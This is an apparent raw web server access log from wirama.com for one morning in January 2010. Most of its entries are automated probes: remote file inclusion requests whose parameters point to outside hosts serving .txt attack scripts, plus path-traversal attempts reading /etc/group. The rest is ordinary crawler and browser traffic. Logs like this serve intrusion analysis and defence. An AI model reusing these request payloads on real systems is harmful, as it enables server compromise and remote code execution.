142.150.1.9 - - [01/Jan/2010:09:11:38 -0800] "GET /logs/access_090601.log//login.php?dir=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.232.85.247 - - [01/Jan/2010:09:11:48 -0800] "GET /logs/access_090731.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:09:15:28 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:09:15:28 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:09:15:28 -0800] "GET /logs/access_090331.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:09:15:28 -0800] "GET /logs/access_090601.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:17:42 -0800] "GET /login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:17:56 -0800] "GET /logs/access_090331.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:17:56 -0800] "GET /logs//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
216.155.151.198 - - [01/Jan/2010:09:17:56 -0800] "GET /logs/access_090601.log//login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:22:55 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:22:55 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:23:00 -0800] "GET /logs/access_091201.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:23:00 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:23:00 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.37.199.41 - - [01/Jan/2010:09:23:00 -0800] "GET /logs/access_091201.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.realtyicons.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:31:35 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:31:35 -0800] "GET /logs/access_090401.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:31:35 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:32:23 -0800] "GET /logs/access_091101.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:33:46 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:33:46 -0800] "GET /logs/access_090401.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:33:46 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
187.4.5.250 - - [01/Jan/2010:09:34:26 -0800] "GET /logs/access_091101.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
84.165.126.15 - - [01/Jan/2010:09:50:10 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121602 Ubuntu/8.04 (hardy) Firefox/3.0.16" "www.wirama.com"
84.165.126.15 - - [01/Jan/2010:09:50:10 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121602 Ubuntu/8.04 (hardy) Firefox/3.0.16" "www.wirama.com"
84.165.126.15 - - [01/Jan/2010:09:50:14 -0800] "GET /favicon.ico HTTP/1.1" 404 - "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121602 Ubuntu/8.04 (hardy) Firefox/3.0.16" "www.wirama.com"
84.165.126.15 - - [01/Jan/2010:09:50:20 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121602 Ubuntu/8.04 (hardy) Firefox/3.0.16" "www.wirama.com"
84.165.126.15 - - [01/Jan/2010:09:50:22 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121602 Ubuntu/8.04 (hardy) Firefox/3.0.16" "www.wirama.com"
187.4.5.250 - - [01/Jan/2010:10:00:28 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
187.4.5.250 - - [01/Jan/2010:10:00:28 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
187.4.5.250 - - [01/Jan/2010:10:00:28 -0800] "GET /logs/access_090801.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:01 -0800] "GET /logs/access_090801.log/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:01 -0800] "GET /logs/access_090801.log/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:02 -0800] "GET /logs/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:02 -0800] "GET /logs/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:03 -0800] "GET /active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:07:03 -0800] "GET /active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:08:19 -0800] "GET /logs/access_090801.log%20/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:10:08:19 -0800] "GET /logs/access_090801.log%20/active/components/xmlrpc/client.php?c[components]=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:04 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:05 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:05 -0800] "GET /logs/access_090801.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:31 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:10:10:32 -0800] "GET /logs/access_090731.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.185 - - [01/Jan/2010:10:12:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.106.185 - - [01/Jan/2010:10:13:29 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.179 - - [01/Jan/2010:10:14:12 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:13 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:13 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:13 -0800] "GET /appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:13 -0800] "GET /logs/access_090801.log%20%20//appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:13 -0800] "GET /logs/access_090801.log%20%20//appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:14:16 -0800] "GET /appserv/main.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:10:19:54 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:10:19:54 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:10:19:54 -0800] "GET /logs/access_091031.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:55 -0800] "GET /logs/access_090801.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:56 -0800] "GET /logs/access_090801.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:56 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.220.174.89 - - [01/Jan/2010:10:20:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:21:56 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:21:56 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:21:56 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:23:22 -0800] "GET /logs/access_090501.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.93.147.154 - - [01/Jan/2010:10:24:06 -0800] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.93.147.154 - - [01/Jan/2010:10:24:09 -0800] "GET /logs/access_090731.log//appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.93.147.154 - - [01/Jan/2010:10:24:11 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:30:39 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:30:39 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:30:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:20 -0800] "GET /logs/access_090330.log%20%20//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:20 -0800] "GET /config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:20 -0800] "GET /logs//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:20 -0800] "GET /logs/access_090329.log%20%20//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:29 -0800] "GET /logs/access_090331.log//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:29 -0800] "GET /config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:29 -0800] "GET /logs//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:43 -0800] "GET /config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:43 -0800] "GET /logs//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:42:43 -0800] "GET /logs/access_090331.log//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:10:43:21 -0800] "GET /logs/access_090329.log//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:43:21 -0800] "GET /logs/access_090330.log//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:43:21 -0800] "GET /logs//config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:10:43:21 -0800] "GET /config.php?xcart_dir=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
188.163.68.133 - - [01/Jan/2010:10:43:33 -0800] "GET /logs/access_090331.log HTTP/1.0" 200 82112 "http://www.wirama.com/logs/access_090331.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:47:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:47:21 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.47.7.71 - - [01/Jan/2010:10:47:34 -0800] "GET /logs//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:47:34 -0800] "GET /appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:47:34 -0800] "GET /logs/access_090801.log%20%20//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:47:49 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:50:27 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:50:27 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:50:27 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:51:16 -0800] "GET /logs/access_091101.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
207.46.199.180 - - [01/Jan/2010:10:51:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
200.93.147.154 - - [01/Jan/2010:10:52:12 -0800] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.93.147.154 - - [01/Jan/2010:10:52:12 -0800] "GET /logs/access_090801.log//appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.93.147.154 - - [01/Jan/2010:10:52:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.46.199.180 - - [01/Jan/2010:10:53:08 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
61.47.7.71 - - [01/Jan/2010:10:53:10 -0800] "GET /logs/access_090501.log%20%20//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:53:35 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:53:35 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:53:40 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:54:13 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:54:13 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:54:13 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:10:55:40 -0800] "GET /solpot.html?body=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:10:55:40 -0800] "GET /logs/scripts.log//solpot.html?body=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.37.199.41 - - [01/Jan/2010:10:55:40 -0800] "GET /logs//solpot.html?body=http://www.realtyicons.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:56:18 -0800] "GET /logs/access_090801.log//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:56:29 -0800] "GET /appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:56:29 -0800] "GET /logs/access_090801.log%20%20//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.47.7.71 - - [01/Jan/2010:10:56:29 -0800] "GET /logs//appserv/home.php?appserv_root=http://www.tgmsgi.ru/assets/media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:10:57:15 -0800] "GET /logs/access_090401.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:57:15 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
89.38.128.140 - - [01/Jan/2010:10:57:15 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
